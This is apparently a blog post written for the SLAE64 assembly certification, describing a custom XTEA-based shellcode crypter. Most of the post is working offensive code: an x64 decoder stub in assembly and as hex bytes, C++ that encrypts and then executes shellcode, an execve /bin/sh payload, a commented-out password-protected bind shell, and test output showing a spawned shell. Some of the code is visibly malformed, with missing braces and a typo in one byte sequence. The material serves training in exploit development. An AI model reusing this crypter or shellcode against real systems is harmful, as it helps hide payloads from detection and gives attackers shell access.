SLAE Assignment 7 - Custom Shellcode Crypter
This is the last assignment for the SLAE 64bits exam.
The goal of this assignement is to create a custom shellcode crypter.
We are allowed to use any existing encryption scheme and any programming language.
All the source code for this assignment can be found on my github repository
I’ve chosen to implement XTEA a block cipher, because it didn’t seem too long to use as an assembly stub.
The following program can encrypts, (decrypts if you uncomment and call the function), executes and dump stub and encrypted payload.
The payload is easily configurable (but payload longer than 255 bytes may require little modifications)
A new key is generated each time, using a poor random generator.
The encoded payload can be up to 7 bytes longer than original payload.
And the key and encoded payload can introduce null bytes. (but it can be avoided if we test and regenerate the key until there is no more null byte)
First, the decoder stub source code (without the appended encoded payload and key):
lea rsi, [rel _start] ; get memory address of this instruction
add rsi, 101 ; point to memory address of encoded payload (base + stub length without the key)
lea r11, [rsi + 24] ; point to the key (rsi + payload size)
push 3 ; nb of blocks pairs
pop rcx
push rcx ; save actual block pair number on stack
mov r10, 0x8dde6e40 ; init sum
push rsi ; backup encoded payload base address
lodsd ; load first block in eax
xchg eax, ebx ; copy it into ebx
lodsd ; load second block
xchg eax, ebx ; exchange first and second block
push 64 ; set number of iteration
pop rcx
push rcx ; counter used to know if we are working on v1 -=... or v0 -=.....
mov cl, 3 ; because they are slightly different (sum >> 11)
push rax ; push value of first block for later use
push rax
mov edx, eax
shl eax, 4 ; vx << 4
shr edx, 5 ; vx >> 5
xor eax, edx ; (vx << 4) ^ (vx >> 5)
pop rdx
add edx, eax ; ((vx << 4) ^ (vx >> 5)) + v0
push r10
pop rax
dec ecx
je v0 ; if we work on v0 no need jump
shr eax, 11 ; sum >> 11
and eax, 3 ; sum & 3
mov dword eax, [r11 + 4*rax] ; key[sum&3]
add eax, r10d ; sum + key[sum&3]
xor eax, edx ; () ^ ()
sub ebx, eax ; vx -= () ^ ()
pop rax ; vx
dec ecx
js next ; if signed then we are ending (v0 -=...) part so we jump to the next iteration
sub r10d, 0x9E3779B9 ; sum -= delta
xchg eax, ebx ; exchange v1 and v0 value
jmp internal ; jump to start v0 -= part
pop rcx ; set to iteration counter
xchg eax, ebx ; exchange v0 and v1
loopnz decipher_loop
pop rdi ; get base memory address of encoded payload (of first block not decoded)
stosd ; replace encoded block with its decoded version
xchg eax, ebx ; set v1 in eax
stosd ; replace second decoded block
pop rcx ; get blocks pair counter
loopnz next_blocks ; if there are other encoded pair jump else execute decoded payload
; Encoded payload + key, will be appended here.
Then I’ve extracted the hexadecimal code and inserted it into the following c++ code :
#include <string>
#include <vector>
#include <cstdint>
#include <ctime>
#include <cstdlib>
#include <iostream>
#include <iomanip>
#include <cstring>
using namespace std;
// Exec shell payload
string payload = "\x31\xf6\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05";
// Bind shell with pass from Assignment 1 (port 1337, pass L33tP4ss)
// Used to test the modification of the number of blocks pairs and of the encoded shellcode size
//string payload = "\x31\xff\xf7\xe7\xff\xc7\x89\xfe\xff\xc7\xb0\x29\x0f\x05\x89\xd3\x52\x66\x68\x05\x39\x66\x57\x89\xc7\x48\x89\xe6\xb2\x10\xb0\x31\x0f\x05\x89\xde\xb0\x32\x0f\x05\x99\xb0\x2b\x0f\x05\x97\x48\x89\xe6\xb2\x08\x89\xd8\x0f\x05\x48\x87\xfe\x48\xb8\x4c\x33\x33\x74\x50\x34\x73\x73\x48\xaf\x48\x87\xfe\x75\xe3\x89\xde\x31\xc0\x83\xc6\x03\xff\xce\xb0\x21\x0f\x05\x75\xf8\xb0\x3b\x53\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\x89\xde\x99\x0fx05";
// XTea decoder stub
string stub = "\x48\x8d\x35\xf9\xff\xff\xff\x48\x83\xc6\x65\x4c\x8d\x5e\x18\x6a\x03\x59\x51\x41\xba\x40\x6e\xde\x8d\x56\xad\x93\xad\x93\x6a\x40\x59\x51\xb1\x03\x50\x50\x89\xc2\xc1\xe0\x04\xc1\xea\x05\x31\xd0\x5a\x01\xc2\x41\x52\x58\xff\xc9\x74\x03\xc1\xe8\x0b\x83\xe0\x03\x41\x8b\x04\x83\x44\x01\xd0\x31\xd0\x29\xc3\x58\xff\xc9\x78\x0a\x41\x81\xea\xb9\x79\x37\x9e\x93\xeb\xca\x59\x93\xe0\xc3\x5f\xab\x93\xab\x59\xe0\xad";
// Copy paste from :
void encipher(unsigned int num_rounds, uint32_t v[2], uint32_t const key[4]) {
unsigned int i;
uint32_t v0=v[0], v1=v[1], sum=0, delta=0x9E3779B9;
for (i=0; i < num_rounds; i++) {
v0 += (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);
sum += delta;
v1 += (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum>>11) & 3]);
v[0]=v0; v[1]=v1;
// Copy paste from :
// Used to test before writing an asm x64 implementation
void decipher(unsigned int num_rounds, uint32_t v[2], uint32_t const key[4]) {
unsigned int i;
uint32_t v0=v[0], v1=v[1], delta=0x9E3779B9, sum=delta*num_rounds;
for (i=0; i < num_rounds; i++) {
v1 -= (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum>>11) & 3]);
sum -= delta;
v0 -= (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);
v[0]=v0; v[1]=v1;
// Return a vector of blocks from the string passed in parameter
vector<uint32_t> getblocks (string s) {
int nbblock = s.size() / 4;
nbblock += (s.size()%4) > 0 ? 1: 0;
s.resize(nbblock * 4);
// Reverse each char of the same block
string reverted = {};
for(int i = 0; i < s.size(); i += 4){
for(int j = i+3; j >= i; j--)
reverted += (unsigned char)s[j];
s = reverted;
vector<uint32_t> lstblocks = {};
// Change each 4 char into an uint32_t
for(int i = 0; i < s.size(); i+=4) {
lstblocks.push_back((uint32_t)(((unsigned char)s[i])<<24)
|(uint32_t)(((unsigned char)s[i+1])<<16)
|(uint32_t)(((unsigned char)s[i+2])<<8)
|(uint32_t)((unsigned char)s[i+3]));
return lstblocks;
// Generate the 4 uint32_t to compose the Key
uint32_t * generatekey() {
static uint32_t key[] = {(uint32_t) rand(),(uint32_t) rand(),(uint32_t) rand(),(uint32_t) rand()};
return key;
// Return a string where char of each block are in reverse order and print the hexadecimal value of the string
string blocks2hexa(string s) {
string buffer = {};
std::ios oldState(nullptr);
for(int i = 0; i < s.size(); i += 4){
for(int j = i+3; j >= i; j--) {
buffer += (unsigned char)s[j];
cout << "\\x" << hex << setw(2) << setfill('0') << static_cast<uint32_t>((unsigned char)s[j]);
cout << endl << endl;
return buffer;
int main() {
vector<uint32_t> blocks = getblocks(payload);
blocks.resize(blocks.size() + (blocks.size()%2));
uint32_t *key = generatekey();
string encoded = {};
// Encipher the payload block pair by block pair
// And store the result in the encoded string variable
for(int i = 0; i < (blocks.size()-1); i+=2) {
uint32_t currentblocks[2] = {blocks[i], blocks[i+1]};
encipher(64, currentblocks, key);
for(int j = 0; j < 2; j++) {
for(int z = 24; z >=0; z-=8) {
encoded += (unsigned char)((currentblocks[j] >> z) & 0xFF);
// Change the key from 4 uint32_t to a string of 16 char
string strkey = {};
for(int j = 0; j < 4; j++) {
for(int z = 24; z >=0; z-=8) {
strkey += (unsigned char)((key[j] >> z) & 0xFF);
// Set number of blocks pairs and payload size
stub[14] = (unsigned char)(encoded.size()&0xFF);
stub[16] = (unsigned char)((blocks.size()/2)&0xFF);
cout << "Key size : " << strkey.size() << endl;
strkey = blocks2hexa(strkey);
cout << "Encoded payload size : " << encoded.size() << endl;
encoded = blocks2hexa(encoded);
// Append stub + encoded payload + key
stub += encoded;
stub += strkey;
cout << "XTEA Decoder stub + encoded payload + key size: " << stub.size() << endl;
for(int i = 0; i < stub.size(); i++)
cout << "\\x" << hex << setw(2) << setfill('0') << static_cast<uint32_t>((unsigned char)stub[i]);
cout << endl << endl;
// load then execute
char shellcode[sizeof(stub)];
strcpy(shellcode, stub.c_str());
void (* run)() = (void (*)()) shellcode;
After compiling it, we can test it with the execve shellcode :
skrox@kali:~$ g++ -ggdb -m64 -fno-stack-protector -z execstack -o xtea-encoder xtea-encoder.cpp
skrox@kali:~$ ./xtea-encoder
Key size : 16
Encoded payload size : 24
XTEA Decoder stub + encoded payload + key size: 141
$ id
uid=1000(skrox) gid=1000(skrox) groups=1000(skrox)
And this is the end of this assignement and of my SLAE64 posts,
Thank you for reading !
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification
Student ID: PA-14186